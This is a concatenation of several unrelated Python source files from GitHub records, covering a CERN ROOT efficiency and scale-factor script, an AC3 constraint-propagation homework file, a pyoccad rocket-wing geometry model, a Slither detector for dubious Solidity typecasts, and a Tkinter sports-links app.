for k in ['efficiency_ratio', 'err_low', 'err_hi']])\n\n idRelErr = max(idset[1:]) / idset[0]\n isoRelErr = max(isoset[1:]) / isoset[0]\n\n muon.SetBinContent(iPt + 1, iEta + 1, idset[0] * isoset[0])\n muon.SetBinError(iPt + 1, iEta + 1, idset[0] * isoset[0] * math.sqrt(math.pow(idRelErr, 2.) 
+ math.pow(isoRelErr, 2.)))\n\n idset = tuple([muonID[etabinName][ptbinName]['data'][k] for k in ['efficiency', 'err_low', 'err_hi']])\n isoset = tuple([muonISO[etabinName][ptbinName]['data'][k] for k in ['efficiency', 'err_low', 'err_hi']])\n\n idRelErr = max(idset[1:]) / idset[0]\n isoRelErr = max(isoset[1:]) / isoset[0]\n\n muonData.SetBinContent(iPt + 1, iEta + 1, idset[0] * isoset[0])\n muonData.SetBinError(iPt + 1, iEta + 1, idset[0] * isoset[0] * math.sqrt(math.pow(idRelErr, 2.) + math.pow(isoRelErr, 2.)))\n\n idset = tuple([muonID[etabinName][ptbinName]['mc'][k] for k in ['efficiency', 'err_low', 'err_hi']])\n isoset = tuple([muonISO[etabinName][ptbinName]['mc'][k] for k in ['efficiency', 'err_low', 'err_hi']])\n\n idRelErr = max(idset[1:]) / idset[0]\n isoRelErr = max(isoset[1:]) / isoset[0]\n\n muonMC.SetBinContent(iPt + 1, iEta + 1, idset[0] * isoset[0])\n muonMC.SetBinError(iPt + 1, iEta + 1, idset[0] * isoset[0] * math.sqrt(math.pow(idRelErr, 2.) + math.pow(isoRelErr, 2.)))\n\nidSFOutputFile.cd()\nidSFOutputFile.Write()\nidSFOutputFile.Close()\n\nsamples = ['WGToLNuG', 'ZGToLLG', 'TTGJets']\n\nfor sample in samples:\n effOutputFile = ROOT.TFile.Open('/afs/cern.ch/user/y/yiiyama/output/GammaL/main/idEfficiency/' + sample + '.root', 'recreate')\n \n source = ROOT.TFile.Open('rooth://ncmu40//store/idEfficiency/' + sample + '.root')\n tree = source.Get('idTree')\n\n photon_eff = ROOT.TProfile2D('photon_eff', 'Photon ID efficiency', len(photonPtBins) - 1, photonPtBins, len(photonEtaBins) - 1, photonEtaBins)\n electron_eff = ROOT.TProfile2D('electron_eff', 'Electron ID efficiency', len(electronPtBins) - 1, electronPtBins, len(electronEtaBins) - 1, electronEtaBins)\n muon_eff = ROOT.TProfile2D('muon_eff', 'Muon ID efficiency', len(muonPtBins) - 1, muonPtBins, len(muonEtaBins) - 1, muonEtaBins)\n\n tree.Draw('recoId>0:TMath::Abs(eta):pt>>photon_eff', 'weight * (pdgId == 22 && genIso < 5.)', 'prof goff')\n tree.Draw('recoId>1:TMath::Abs(eta):pt>>electron_eff', 'weight * (TMath::Abs(pdgId) == 11)', 'prof goff')\n tree.Draw('recoId>1:TMath::Abs(eta):pt>>muon_eff', 'weight * (TMath::Abs(pdgId) == 13)', 'prof goff')\n\n photon_eff.SetDirectory(effOutputFile)\n electron_eff.SetDirectory(effOutputFile)\n muon_eff.SetDirectory(effOutputFile)\n\n source.Close()\n\n effOutputFile.cd()\n effOutputFile.Write()\n effOutputFile.Close()\n\n\nhltSFOutputFile = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/main/hltEfficiency/scalefactors.root', 'recreate')\n\nphotonDataSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/photon/data.root')\nphotonDataL1 = photonDataSource.Get('SingleEG22_etaNVtx_eff')\nphotonDataHLT = photonDataSource.Get('Ph36IdIso_etaNVtx_eff')\n#photonDataL1 = photonDataSource.Get('SingleEG22_ptEta_eff')\n#photonDataHLT = photonDataSource.Get('Ph36IdIso_ptEta_eff')\n\nphotonMCSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/photon/dye.root')\nphotonMCL1 = photonMCSource.Get('SingleEG22_etaNVtx_eff')\nphotonMCHLT = photonMCSource.Get('Ph36IdIso_etaNVtx_eff')\n#photonMCL1 = photonMCSource.Get('SingleEG22_ptEta_eff')\n#photonMCHLT = photonMCSource.Get('Ph36IdIso_ptEta_eff')\n\nhltSFOutputFile.cd()\nphoton_e = photonDataHLT.Clone('photon_e')\n\nfor iX in range(1, photon_e.GetNbinsX() + 1):\n for iY in range(1, photon_e.GetNbinsY() + 1):\n bin = photon_e.GetBin(iX, iY)\n\n sf = photonDataL1.GetBinContent(bin) * photonDataHLT.GetBinContent(bin) / photonMCL1.GetBinContent(bin) / photonMCHLT.GetBinContent(bin)\n relErr2 = 0.\n relErr = 
photonDataL1.GetBinError(bin) / photonDataL1.GetBinContent(bin)\n relErr2 += relErr * relErr\n relErr = photonDataHLT.GetBinError(bin) / photonDataHLT.GetBinContent(bin)\n relErr2 += relErr * relErr\n relErr = photonMCL1.GetBinError(bin) / photonMCL1.GetBinContent(bin)\n relErr2 += relErr * relErr\n relErr = photonMCHLT.GetBinError(bin) / photonMCHLT.GetBinContent(bin)\n relErr2 += relErr * relErr\n\n photon_e.SetBinContent(bin, sf)\n photon_e.SetBinError(bin, sf * math.sqrt(relErr2))\n\nphotonDataSource.Close()\nphotonMCSource.Close()\n\nphotonDataSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/mueg_ph/data.root')\nphotonDataHLT = photonDataSource.Get('Ph22CaloIdL_inclusive_eff')\n\nphotonMCSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/mueg_ph/zg.root')\nphotonMCHLT = photonMCSource.Get('Ph22CaloIdL_inclusive_eff')\n\nhltSFOutputFile.cd()\nphoton_mu = photonDataHLT.Clone('photon_mu')\n\nsf = photonDataHLT.GetBinContent(1) / photonMCHLT.GetBinContent(1)\nrelErr2 = 0.\nrelErr = photonDataHLT.GetBinError(1) / photonDataHLT.GetBinContent(1)\nrelErr2 += relErr * relErr\nrelErr = photonMCHLT.GetBinError(1) / photonMCHLT.GetBinContent(1)\nrelErr2 += relErr * relErr\n\nphoton_mu.SetBinContent(1, sf)\nphoton_mu.SetBinError(1, sf * math.sqrt(relErr2))\n\nphotonDataSource.Close()\nphotonMCSource.Close()\n\nelectronDataSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/electron/data.root')\nelectronDataHLT = electronDataSource.Get('Ph22IdIso_etaNVtx_eff')\n#electronDataHLT = electronDataSource.Get('Ph22IdIso_ptEta_eff')\n\nelectronMCSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/electron/dy.root')\nelectronMCHLT = electronMCSource.Get('Ph22IdIso_etaNVtx_eff')\n#electronMCHLT = electronMCSource.Get('Ph22IdIso_ptEta_eff')\n\nhltSFOutputFile.cd()\nelectron = electronDataHLT.Clone('electron')\n\nfor iX in range(1, electron.GetNbinsX() + 1):\n for iY in range(1, electron.GetNbinsY() + 1):\n bin = electron.GetBin(iX, iY)\n\n sf = electronDataHLT.GetBinContent(bin) / electronMCHLT.GetBinContent(bin)\n relErr2 = 0.\n try:\n relErr = electronDataHLT.GetBinError(bin) / electronDataHLT.GetBinContent(bin)\n except ZeroDivisionError:\n relErr = 0.\n relErr2 += relErr * relErr\n relErr = electronMCHLT.GetBinError(bin) / electronMCHLT.GetBinContent(bin)\n relErr2 += relErr * relErr\n\n electron.SetBinContent(bin, sf)\n electron.SetBinError(bin, sf * math.sqrt(relErr2))\n\nelectronDataSource.Close()\nelectronMCSource.Close()\n\nmuonDataSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/mueg_mu/data.root')\nmuonDataHLT = muonDataSource.Get('Mu22_eta_eff')\n\nmuonMCSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/mueg_mu/zg.root')\nmuonMCHLT = muonMCSource.Get('Mu22_eta_eff')\n\nhltSFOutputFile.cd()\nmuon = muonDataHLT.Clone('muon')\n\nfor bin in range(1, muon.GetNbinsX() + 1):\n sf = muonDataHLT.GetBinContent(bin) / muonMCHLT.GetBinContent(bin)\n relErr2 = 0.\n relErr = muonDataHLT.GetBinError(bin) / muonDataHLT.GetBinContent(bin)\n relErr2 += relErr * relErr\n relErr = muonMCHLT.GetBinError(bin) / muonMCHLT.GetBinContent(bin)\n relErr2 += relErr * relErr\n\n muon.SetBinContent(bin, sf)\n muon.SetBinError(bin, sf * math.sqrt(relErr2))\n\nmuonDataSource.Close()\nmuonMCSource.Close()\n\nmuegDataSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/mueg_cross/data.root')\nmuegDataHLT = muegDataSource.Get('Mu3p5EG12_inclusive_eff')\n\nmuegMCSource = 
ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/mueg_cross/zg.root')\nmuegMCHLT = muegMCSource.Get('Mu3p5EG12_inclusive_eff')\n\nhltSFOutputFile.cd()\nmueg = muegDataHLT.Clone('mueg')\n\nsf = muegDataHLT.GetBinContent(1) / muegMCHLT.GetBinContent(1)\nrelErr2 = 0.\nrelErr = muegDataHLT.GetBinError(1) / muegDataHLT.GetBinContent(1)\nrelErr2 += relErr * relErr\nrelErr = muegMCHLT.GetBinError(1) / muegMCHLT.GetBinContent(1)\nrelErr2 += relErr * relErr\n\nmueg.SetBinContent(1, sf)\nmueg.SetBinError(1, sf * math.sqrt(relErr2))\n\nmuegDataSource.Close()\nmuegMCSource.Close()\n\nhltSFOutputFile.cd()\nhltSFOutputFile.Write()\nhltSFOutputFile.Close()\n\n\nsamples = [('WGToLNuG', 'wg'), ('ZGToLLG', 'zg'), ('TTGJets', 'ttg')]\nplots = [('photon_e', 'photon', ('SingleEG22', 'Ph36IdIso'), 'etaNVtx'), ('photon_mu', 'mueg_ph', 'Ph22CaloIdL', 'etaNVtx'), ('electron', 'electron', 'Ph22IdIso', 'etaNVtx'), ('muon', 'mueg_mu', 'Mu22', 'eta')]\n#plots = [('photon_e', 'photon', ('SingleEG22', 'Ph36IdIso'), 'ptEta'), ('photon_mu', 'mueg_ph', 'Ph22CaloIdL', 'inclusive'), ('electron', 'electron', 'Ph22IdIso', 'ptEta'), ('muon', 'mueg_mu', 'Mu22', 'ptEta')]\n\nfor fullname, shortname in samples:\n effOutputFile = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/main/hltEfficiency/' + fullname + '.root', 'recreate')\n for obj, measName, filterName, var in plots:\n source = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/' + measName + '/' + shortname + '.root')\n eff = None\n if type(filterName) is tuple:\n if var == 'inclusive':\n raise RuntimeError('Cannot multiply graphs')\n \n for filt in filterName:\n if not eff:\n eff = source.Get(filt + '_' + var + '_eff')\n else:\n eff.Multiply(source.Get(filt + '_' + var + '_eff'))\n else:\n eff = source.Get(filterName + '_' + var + '_eff')\n\n eff.SetName(obj + '_eff')\n eff.SetDirectory(effOutputFile)\n effOutputFile.cd()\n eff.Write()\n\n source.Close()\n\n effOutputFile.Close()\n","repo_name":"yiiyama/plotstack","sub_path":"GammaL/effSources.py","file_name":"effSources.py","file_ext":"py","file_size_in_byte":14389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72323059672","text":"# -*- coding: utf-8 -*-\nfrom p2_is_consistent import is_consistent\nfrom p1_is_complete import is_complete\n__author__ = 'Please write your names, separated by commas.'\n__email__ = 'Please write your email addresses, separated by commas.'\n\nfrom collections import deque\n\n\ndef ac3(csp, arcs=None):\n \"\"\"Executes the AC3 or the MAC (p.218 of the textbook) algorithms.\n\n If the parameter 'arcs' is None, then this method executes AC3 - that is, it will check the arc consistency\n for all arcs in the CSP. 
Otherwise, this method starts with only the arcs present in the 'arcs' parameter\n in the queue.\n\n Note that the current domain of each variable can be retrieved by 'variable.domains'.\n\n This method returns True if the arc consistency check succeeds, and False otherwise.\"\"\"\n #print \"============BEGIN==================\"\n\n queue_arcs = deque(arcs if arcs is not None else csp.constraints.arcs())\n\n \"\"\"\n print \"QUEUE ARCS\"\n for x in queue_arcs:\n print x\n print \"fin queue arcs\"\n print \"\\nconstraints\"\n for x in csp.constraints:\n print x\n print \"end constraints\"\n \"\"\"\n while queue_arcs:\n (v1, v2) = queue_arcs.pop()\n #print str(v1) + \"---\"+ str(v2)\n if revise(csp, v1, v2):\n if not v1.domain:\n return False\n #print str(v1)+ \"LOOK HEREREREREREREAFVSD\"\n for c in csp.constraints[v1]:\n #print \"WTF IS THE ARC\" + str(c)\n if c.var2 != v1 and c.var2 != v2:\n queue_arcs.append((c.var2,v1))\n\n \"\"\"print \"AC3 IS RETURNING TRUE\"\n for x in queue_arcs:\n print x\"\"\"\n\n return True\n \n\n # TODO implement this\n pass\n\ndef revise(csp, xi, xj):\n # You may additionally want to implement the 'revise' method.\n flag = False\n for x in xi.domain:\n count = 0\n for constrain in csp.constraints[xi]:\n #print \"THIS IS THE CONSTRAINT \" + str(constrain) + \"AND THIS IS VAL \" + x\n for y in xj.domain:\n #print str(x) + \" &*&*(^& WHAT THE ACTUAL FUCK \" + str(y)\n if (constrain.var2 == xj and (constrain.is_satisfied(x, y))):\n count += 1\n if count == 0:\n flag = True\n xi.domain.remove(x)\n #print \"THIS IS THE REVISE FLAG RETURNED \" + str(flag)\n return flag\n\n\n\n\n\n\"\"\"\n flag = False\n exists = 0\n print str(xi) + \" revised with \" + str(xj)\n print csp.constraints[xi]\n for x in xi.domain:\n print x\n if not any([(con.is_satisfied(x,y) for con in csp.constraints[xi]) for y in xj.domain]):\n print \"REVISE CONSR3R12385780&&*(^798\"\n flag = True\n xi.domain.remove(x)\n for q in csp.variables:\n if q == xi:\n q.domain.remove(x)\n return flag\n if exists == 0:\n flag = True\n for val in csp.variables:\n if val == xj:\n val.domain.remove(x)\n\n if flag = True:\n for var in csp.variables:\n if var = xi:\n csp.\n pass\n\"\"\"","repo_name":"bashlord/Heuristics","sub_path":"AC3/solutions/p4_ac3.py","file_name":"p4_ac3.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"627890250","text":"import numpy as np\nfrom cosapp.base import System\nfrom OCC.Core.BRepAlgoAPI import BRepAlgoAPI_Fuse\nfrom OCC.Core.BRepGProp import brepgprop\nfrom OCC.Core.gp import gp_Pnt, gp_Vec\nfrom OCC.Core.GProp import GProp_GProps\nfrom OCC.Core.TopoDS import TopoDS_Compound\nfrom pyoccad.create import CreateEdge, CreateExtrusion, CreateFace, CreateTopology, CreateWire\n\n\nclass WingsGeom(System):\n \"\"\"Pyoccad model of a set of wings.\n\n Inputs\n ------\n\n Outputs\n ------\n shape: TopoDS_Compound,\n pyoccad model\n props: GProp_GProps,\n model properties\n \"\"\"\n\n def setup(self):\n\n # Geometric parameters\n self.add_inward(\"n\", 4, desc=\"Number of wings\", unit=\"\")\n self.add_inward(\"l_in\", 1.0, desc=\"rocket edge length\", unit=\"m\")\n self.add_inward(\"l_out\", 0.5, desc=\"free edge length\", unit=\"m\")\n self.add_inward(\"width\", 4 / 3, desc=\"width\", unit=\"m\")\n self.add_inward(\"th\", 0.1, desc=\"thickness\", unit=\"m\")\n\n # Density\n self.add_inward(\"rho\", 10.0, desc=\"density\", unit=\"kg/m**3\")\n\n # Positional parameters\n 
self.add_inward(\"radius\", 1.0, desc=\"radius of the set\", unit=\"m\")\n self.add_inward(\"pos\", 0.0, desc=\"lowest point z-coordinate\", unit=\"m\")\n\n # Outputs\n self.add_outward(\"shape\", TopoDS_Compound(), desc=\"pyoccad model\")\n self.add_outward(\"props\", GProp_GProps(), desc=\"model properties\")\n\n def compute(self):\n\n self.shape = self.create_wings(\n self.n, self.radius, self.pos, self.l_in, self.l_out, self.width, self.th\n )\n vprop = GProp_GProps()\n brepgprop.VolumeProperties(self.shape, vprop)\n self.props = GProp_GProps()\n self.props.Add(vprop, self.rho)\n\n def create_wings(self, n_wings, radius, pos, l_in, l_out, width, th):\n \"\"\"Create a pyoccad model of a set of wings.\n\n Inputs\n ------\n n_wings: int,\n the number of wings\n radius: float,\n the distance of the internal edges to the center\n pos: float,\n the lower edges' z-coordinate\n l_in: float,\n the length of the inner edges\n l_out: float,\n the length of the outer edges\n width: float,\n width\n th: float,\n thickness\n\n Outputs\n ------\n\n fusion: TopoDS_Solid,\n pyoccad model of the set of wings\n \"\"\"\n\n theta = 2 * np.pi / n_wings\n shapes = [None] * n_wings\n\n for i in range(n_wings):\n\n ang = theta * i\n\n p1 = gp_Pnt(radius * np.cos(ang), radius * np.sin(ang), pos)\n p2 = gp_Pnt((radius + width) * np.cos(ang), (radius + width) * np.sin(ang), pos)\n p3 = gp_Pnt((radius + width) * np.cos(ang), (radius + width) * np.sin(ang), pos + l_out)\n p4 = gp_Pnt(radius * np.cos(ang), radius * np.sin(ang), pos + l_in)\n\n edge1 = CreateEdge().from_2_points(p1, p2)\n edge2 = CreateEdge().from_2_points(p2, p3)\n edge3 = CreateEdge().from_2_points(p3, p4)\n edge4 = CreateEdge().from_2_points(p4, p1)\n\n contour = CreateWire().from_elements([edge1, edge2, edge3, edge4])\n face = CreateFace().from_contour(contour)\n shell = CreateExtrusion().surface(face, gp_Vec(-th * np.sin(ang), th * np.cos(ang), 0))\n shapes[i] = CreateTopology().make_solid(shell)\n\n fusion = BRepAlgoAPI_Fuse(shapes[0], shapes[1]).Shape()\n\n for i in range(2, n_wings):\n fusion = BRepAlgoAPI_Fuse(fusion, shapes[i]).Shape()\n\n return fusion\n","repo_name":"twiinIT/rocket-twin","sub_path":"rocket_twin/systems/structure/wings_geom.py","file_name":"wings_geom.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"1916752639","text":"import asyncio\nimport logging\nimport sys\nfrom threading import Thread\nfrom glob import glob\n\nfrom input import sierra\nfrom sessions import Session\nfrom utils.logging import log\n\n\nclass Service:\n def __init__(self):\n self.thread = Thread(target=Service.thread)\n\n @staticmethod\n def thread():\n log.info('Starting Session ...')\n asyncio.run(session.gather())\n\n def start(self):\n self.thread.start()\n\n\nclass API:\n def __init__(self):\n self.thread = Thread(target=API.thread)\n\n @staticmethod\n def thread():\n log.info('Starting API ...')\n sys.modules['flask.cli'].show_server_banner = lambda *x: None\n logging.getLogger(\"werkzeug\").setLevel(logging.ERROR)\n sierra.run(port=8008)\n\n def start(self):\n self.thread.start()\n\n\nif __name__ == '__main__':\n with Session() as session:\n saves = glob('saves/*.sierra')\n if saves:\n if input('Load history from previous session? 
(y/N): ').lower().startswith('y'):\n                log.info(''.join([f'{i}: {save}\\n' for i, save in enumerate(saves)]))\n                index = int(input('Load save: '))\n                session.load(saves[index])\n\n        Service().start()\n        API().start()\n        session.windows.start()\n","repo_name":"StarCityIndustries/sierra","sub_path":"sierra.py","file_name":"sierra.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70915115032","text":"from typing import List, Tuple\nfrom slither.detectors.abstract_detector import AbstractDetector, DetectorClassification\nfrom slither.slithir.operations import TypeConversion, Operation\nfrom slither.core.declarations import FunctionContract\nfrom slither.core.cfg.node import Node\n\n\ndef is_ok_cast(from_type: str, to_type: str) -> bool:\n    if from_type == to_type:\n        return True\n    if from_type == \"address\" or to_type == \"address\":\n        # address <-> interface/contract/this\n        # address <-> uint160 (solidity doesn't allow other direct casts of address)\n        return True\n\n    if \"bytes\" in from_type and \"bytes\" in to_type:\n        # bytesX <-> bytesY will have different results\n        return False\n\n    if \"bytes\" in from_type or \"bytes\" in to_type:\n        return True\n\n    if \"uint\" == from_type[:4] and \"uint\" == to_type[:4]:\n        size_from = from_type[4:]\n        if size_from == \"\":\n            size_from = \"256\"\n\n        size_to = to_type[4:]\n        if size_to == \"\":\n            size_to = \"256\"\n\n        if int(size_from) > int(size_to):\n            return False\n        return True\n\n    if \"int\" == from_type[:3] and \"int\" == to_type[:3]:\n        size_from = from_type[3:]\n        if size_from == \"\":\n            size_from = \"256\"\n\n        size_to = to_type[3:]\n        if size_to == \"\":\n            size_to = \"256\"\n\n        if int(size_from) > int(size_to):\n            return False\n        return True\n\n    sorted_types = sorted([from_type, to_type])\n    if \"int\" == sorted_types[0][:3] and \"uint\" == sorted_types[1][:4]:\n        return False\n\n    return True\n\n\nclass DubiousTypecast(AbstractDetector):\n    \"\"\"\n    Shows nonstandard typecasts.\n    \"\"\"\n\n    ARGUMENT = \"pess-dubious-typecast\" # slither will launch the detector with slither.py --detect mydetector\n    HELP = \"uint8 = uint8(uint256)\"\n    IMPACT = DetectorClassification.MEDIUM\n    CONFIDENCE = DetectorClassification.HIGH\n\n    WIKI = \"https://github.com/pessimistic-io/slitherin/blob/master/docs/dubious_typecast.md\"\n    WIKI_TITLE = \"Dubious Typecast\"\n    WIKI_DESCRIPTION = \"Check docs\"\n    WIKI_EXPLOIT_SCENARIO = (\n        \"Can produce unpredictable results because of nonstandard typecasts\"\n    )\n    WIKI_RECOMMENDATION = \"Use clear constants\"\n\n    def analyze_irs(self, irs: List[Operation]) -> List[Tuple[str, str]]:\n        results = []\n        for i in irs:\n            try:\n                if isinstance(i, TypeConversion):\n                    from_type = i.variable.type\n                    to_type = i.type\n\n                    if not (is_ok_cast(str(from_type), str(to_type))):\n                        results.append((from_type, to_type))\n            except Exception as e:\n                print(\"DubiousTypecast:Failed to check types\", e)\n                print(i)\n\n        return results\n\n    def get_dubious_typecasts(self, fun: FunctionContract, params=None):\n        results: List[Tuple[Node, List[Tuple[str, str]]]] = []\n        for node in fun.nodes:\n            node_res = self.analyze_irs(node.irs)\n            if node_res:\n                results.append((node, node_res))\n        return results\n\n    def _detect(self):\n        results = []\n        for contract in self.compilation_unit.contracts_derived:\n            for f in contract.functions:\n                func_res = self.get_dubious_typecasts(f)\n                if func_res:\n                    info = [\"Dubious typecast in \", f, \":\\n\"]\n                    for node, node_res in func_res:\n                        for from_type, 
to_type in node_res:\n info += [\n f\"\\t{str(from_type)} => {str(to_type)} casting occurs in \",\n node,\n \"\\n\",\n ]\n res = self.generate_result(info)\n res.add(f)\n results.append(res)\n\n return results\n","repo_name":"pessimistic-io/slitherin","sub_path":"slither_pess/detectors/dubious_typecast.py","file_name":"dubious_typecast.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","stars":298,"dataset":"github-code","pt":"5"} +{"seq_id":"6127788932","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Raymond F. Pauszek III, Ph.D. (2020)\nsmtirf >> gui >> plots >> canvases_traceviewer\n\"\"\"\nfrom matplotlib.gridspec import GridSpec\nimport matplotlib as mpl\n\nfrom . import QtCanvas, ScrollableCanvas, InteractiveCanvas\n\n__all__ = [\"TraceViewerPlot\"]\n\nclass TraceViewerPlot(ScrollableCanvas, InteractiveCanvas):\n\n def connect(self):\n super().connect()\n self.controller.currentTraceChanged.connect(self.update_plots)\n self.controller.traceEdited.connect(self.update_plots)\n self.controller.selectedEdited.connect(self.update_plots)\n self.controller.modelTrained.connect(self.update_plots)\n self.mpl_connect('motion_notify_event', self.controller.motion_notify)\n self.mpl_connect('button_release_event', self.on_release)\n self.controller.experimentLoaded.connect(self.refresh)\n\n def refresh(self, expt):\n for ax in self.fig.axes:\n ax.remove()\n gs = GridSpec(3, 1)\n self.ax1 = self.fig.add_subplot(gs[0], projection=expt.classLabel)\n self.ax2 = self.fig.add_subplot(gs[1], projection=\"donoracceptor\")\n self.ax3 = self.fig.add_subplot(gs[2], projection=\"total\")\n\n self.set_zoom_axes(self.ax1, button=1)\n self.set_baseline_axes(self.ax3, button=3)\n self.draw()\n\n def update_plots(self, trc):\n for ax in self.fig.axes:\n try:\n ax.set_trace(trc)\n except AttributeError:\n # thrown when Experiment type changes, because ref still active\n # til garbage collected\n pass\n self.draw()\n\n def on_release(self, evt):\n if evt.inaxes == self.ax2 and evt.xdata is not None:\n if evt.button == 1: # start\n self.controller.set_trace_start_time(evt.xdata)\n elif evt.button == 3: # stop\n self.controller.set_trace_stop_time(evt.xdata)\n elif evt.inaxes == self.ax1 and evt.button == 3:\n for ax in self.fig.axes:\n ax.unzoom()\n self.draw()\n","repo_name":"rpauszek/smtirf","sub_path":"gui/plots/canvases_traceviewer.py","file_name":"canvases_traceviewer.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"71112257753","text":"from tkinter import *\nfrom tkinter import ttk\nimport webbrowser\nfrom pyquery import PyQuery as pq\nimport requests\n\ndef näita():\n def scrapimine(klass, lehekülg):\n page = requests.get(lehekülg)\n page_html = page.text\n q = pq(page_html)\n elemendid = q(klass)\n vajalik = []\n for i in range(3, len(elemendid), 3):\n järjend = []\n for j in range(3):\n if (i + j) < len(elemendid) \\\n and q(q(klass)[i + j]).text() != '':\n järjend.append(q(q(klass)[i + j]).text())\n if len(järjend) != 0:\n vajalik.append(järjend)\n return(vajalik)\n\n def linna_valimine(linn, järjend):\n lst = []\n for i in range(len(järjend)):\n if linn in järjend[i]:\n lst.append(järjend[i])\n return lst\n\n spordiüritused = scrapimine('tr td', 'http://www.sport.ee/et/tegevused/spordiuritused')\n tartu = linna_valimine('Tartu', spordiüritused)\n\n app = Toplevel()\n app.geometry(\"400x450+400+100\")\n app.title(\"Sport\")\n\n canvas = 
Canvas(app,width = 500, height = 500, bg=\"black\")\n canvas.pack(expand = YES, fill = BOTH)\n gif1 = PhotoImage(file = 'LinksPildid/Tartu/sportTartu.gif')\n canvas.create_image(0,75, image = gif1, anchor = NW)\n\n lst = Listbox(app, activestyle='dotbox',\\\n fg='black', highlightbackground='blue',\\\n highlightcolor='green', width=50)\n lst.insert(END,\"Tartu spordiüritused\")\n lst.insert(END,\" \")\n\n for i in range(len(tartu)):\n for j in range(len(tartu[i])):\n lst.insert(END,tartu[i][j])\n\n lst.insert(END,\" \")\n lst.insert(END,\"Rohkem spordivõimalusi Tallinnas saad leida lingides\")\n lst.place(x=50,y=250)\n\n def Link1():\n webbrowser.open(\"http://www.aurakeskus.ee/\")\n button1 = ttk.Button(app, text = \"Ujumine\", command = Link1)\n button1.pack()\n button1.place(x=170, y=10, width=60)\n\n\n def Link2():\n webbrowser.open(\"http://www.volley.ee/\")\n button2 = ttk.Button(app, text = \"Võrkpall\", command = Link2)\n button2.pack()\n button2.place(x=170, y=60, width=60)\n\n def Link3():\n webbrowser.open(\"http://www.myfitness.ee/tartu/t\")\n button3 = ttk.Button(app, text = \"Fitness\", command = Link3)\n button3.pack()\n button3.place(x=270, y=10, width=60)\n\n\n def Link4():\n webbrowser.open(\"http://www.tartutennis.ee/\")\n button4 = ttk.Button(app, text = \"Tennis\", command = Link4)\n button4.pack()\n button4.place(x=270, y=60, width=60)\n\n def Link5():\n webbrowser.open(\"http://sport.ut.ee/\")\n button5 = ttk.Button(app, text = \"Jõusaal\", command = Link5)\n button5.pack()\n button5.place(x=170, y=120, width=60)\n\n app.mainloop()\n","repo_name":"jsutStacy/ProjektPythonChill","sub_path":"Chill/Links/Tartu/sport.py","file_name":"sport.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11469432219","text":"import sys\nt = int(input())\nres=[]\ndef check(a,b):\n c=0\n if(b==1):\n b+=1\n c+=1\n while(a!=0):\n a//=b\n c+=1\n return c\nfor i in range(t):\n a,b = map(int,input().split())\n c=0\n m=sys.maxsize\n for i in range(0,7):\n c=check(a,b+i)+i\n if(c=(height-half_pad_height) and paddle1_vel>0:\n paddle1_vel=0\n if paddle2_pos<=half_pad_height and paddle2_vel<0:\n paddle2_vel=0\n if paddle2_pos>=(height-half_pad_height) and paddle2_vel>0:\n paddle2_vel=0\n \n paddle1_pos+=paddle1_vel\n paddle2_pos+=paddle2_vel\n \n if ball_pos[0]<=radius+pad_width:\n ball_vel[0]=-ball_vel[0]\n \n #if ball_pos<(paddle1_pos+half_pad_height) and ball_pos[1]>(paddle1_pos-half_pad_height):\n # if ball_pos[0]<=radius+pad_width:\n # ball_vel[0]=-ball_vel[0]\n \n \n if ball_pos[0]>=width-radius-pad_width:\n ball_vel[0]=-ball_vel[0]\n \n if ball_pos[1]<=radius:\n ball_vel[1]=-ball_vel[1]\n if ball_pos[1]>=height-radius:\n ball_vel[1]=-ball_vel[1]\n \n if ball_pos[0]<=radius+pad_width:\n ball_pos[0]=ball_pos[0]+(width/2)\n ball_vel[0]=-ball_vel[0]\n score1=score1+1\n if ball_pos[0]>=width-radius-pad_width:\n ball_pos[0]=ball_pos[0]-(width/2)\n ball_vel[0]=-ball_vel[0]\n score=score+1\n\n \n \n ball_pos[0]+=ball_vel[0]\n ball_pos[1]+=ball_vel[1]\n \n \n \n \n \n \n canvas.draw_polygon([(0, paddle1_pos-half_pad_height), (0, paddle1_pos+half_pad_height), (pad_width+3, paddle1_pos+half_pad_height),(pad_width+3,paddle1_pos-half_pad_height)], pad_width-1, \"White\",\"White\")\n canvas.draw_polygon([(width, paddle2_pos-half_pad_height), (width, paddle2_pos+half_pad_height), (width-pad_width-3, paddle2_pos+half_pad_height),(width-pad_width-3,paddle2_pos-half_pad_height)], pad_width-1, 
